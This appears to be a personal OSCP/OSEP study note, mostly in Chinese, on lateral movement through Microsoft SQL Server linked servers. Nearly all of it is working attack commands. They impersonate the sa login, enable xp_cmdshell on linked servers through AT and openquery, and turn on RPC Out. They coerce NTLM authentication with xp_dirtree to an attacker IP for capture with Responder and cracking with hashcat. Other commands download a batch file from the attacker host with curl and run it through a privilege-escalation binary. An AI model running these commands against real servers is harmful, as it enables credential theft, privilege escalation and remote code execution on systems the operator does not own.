1-mssql 横向移动 - My-oscp-all-things

#### hacksqlserver PS：配合GetUserSPNs.ps1使用，若MSSQL SPN 且为目标机器管理员或者具备sqllink时可命令执行 ``` SELECT IS_SRVROLEMEMBER('sysadmin','domain\administrator') SELECT IS_SRVROLEMEMBER('sysadmin','domain\sqlsvc') SELECT IS_SRVROLEMEMBER('sysadmin','domain\adminwebsvc') 1 为重要则为系统成员组 SELECT IS_SRVROLEMEMBER('public'); 为1 则为public role SELECT SYSTEM_USER; SELECT USER_NAME(); SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; EXEC sp_linkedservers; EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT linked-hostname; EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT linked-hostname; EXEC ('xp_cmdshell ''whoami'';') AT linked-hostname; select 1 from openquery("SQL05", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure') //test must priv work links! select version from openquery("linked-hostname", 'select @@version as version') -works! ... sudo responder -I tap0 EXEC master..xp_dirtree "\\192.168.49.57\share"; hashcat 5600 ``` #### powerupsql ``` https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet ``` ### In attation ``` 幸运的是，sysadmin 角色成员资格允许我们使用高级选项和sp_configure存储过程启用 xp_cmdshell。为此，我们需要从模拟_sa_登录开始。之后，我们将使用 sp_configure 存储过程来激活高级选项，然后启用 xp_cmdshell。要激活高级选项以及 xp_cmdshell，我们必须记住使用 _RECONFIGURE_语句更新当前配置的值让我们回顾一下用于模拟 SA 登录、激活高级选项、启用 xp_cmdshell 和执行 whoami命令的代码。 ``` 以及可以打开默认关闭的RPC功能 ``` RPC Out 不是默认开启的设置，但通常由系统管理员设置。如果不允许 RPC Out，如果我们当前的用户具有 sysadmin 角色成员身份，则可以使用_sp_serveroption_存储过程,Microsoft 文档明确指出，在链接的 SQL 服务器上不支持执行存储过程。相反，我们将使用_AT_关键字来指定应该在哪个链接的 SQL 服务器上执行查询。清单 54 显示了启用高级选项所需的查询。 ``` ``` 注意在最后的sql03中关闭了RPC,但是可以使用openquery来查询 ``` ![[Pasted image 20220824203952.png]] ### 最后的准备之快速查询以及一键查询脚本准备 ``` SELECT SYSTEM_USER; SELECT USER_NAME(); EXECUTE AS LOGIN = 'sa'; //normaly it can works, if we have sa or dbo priv, and configure sqllink select version from openquery("sqllinked-hostname", 'select @@version as version') select * from openquery("sqllinked-hostname",'select * from master..sysservers') select version from openquery("sqllinked-hostname", 'select SYSTEM_USER as version') yep select version from openquery("sqllinked-hostname", 'select USER_NAME() as version') yep //执行代码,如果失败用下面的方式 EXEC sp_linkedservers; EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT sqllinked-hostname; EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT sqllinked-hostname; EXEC ('xp_cmdshell ''whoami'';') AT sqllinked-hostname; EXEC master..xp_dirtree "\\192.168.49.110\share"; EXEC master..xp_dirtree "\\192.168.49.110\test\"; sudo responder -I tap0 hashcat 5600 ``` ### 非法改装区 ``` \\openquery -> xp_cmdshell fails work! maybe hidden success select 1 from openquery("sqllinked-hostname", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure') select 1 from openquery("sqllinked-hostname", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure') select 1 from openquery("sqllinked-hostname", 'select 1; EXEC xp_cmdshell ''curl http://192.168.49.57:85''') //非法改装 select 1 from openquery("sqllinked-hostname", 'select 1; EXEC master..xp_dirtree ''\\192.168.49.57\share''') ->成功了! EXEC ('xp_cmdshell ''c:\users\public\pf.exe -i -c "cmd.exe /c c:\users\public\b.bat"'';') AT sqllinked-hostname EXEC ('xp_cmdshell ''curl 192.168.49.57:82/a.bat -o c:\users\public\b.bat'';') AT sqllinked-hostname EXEC ('xp_cmdshell ''dir c:\users\public\'';') AT sqllinked-hostname ``` ### beyond osep ``` EXECUTE AS LOGIN = 'sa'; SELECT is_rpc_out_enabled FROM sys.servers WHERE name = 'sqllinked-hostname'; EXEC sp_serveroption 'sqllinked-hostname', 'rpc out', 'true'; ``` ![[Pasted image 20220825001731.png]] ![[Pasted image 20220825001747.png]] #### other ``` Get-SQLServerLinkCrawl -Instance instance1 -Query "exec master..xp_cmdshell 'cmd /c calc.exe'" -Verbose ```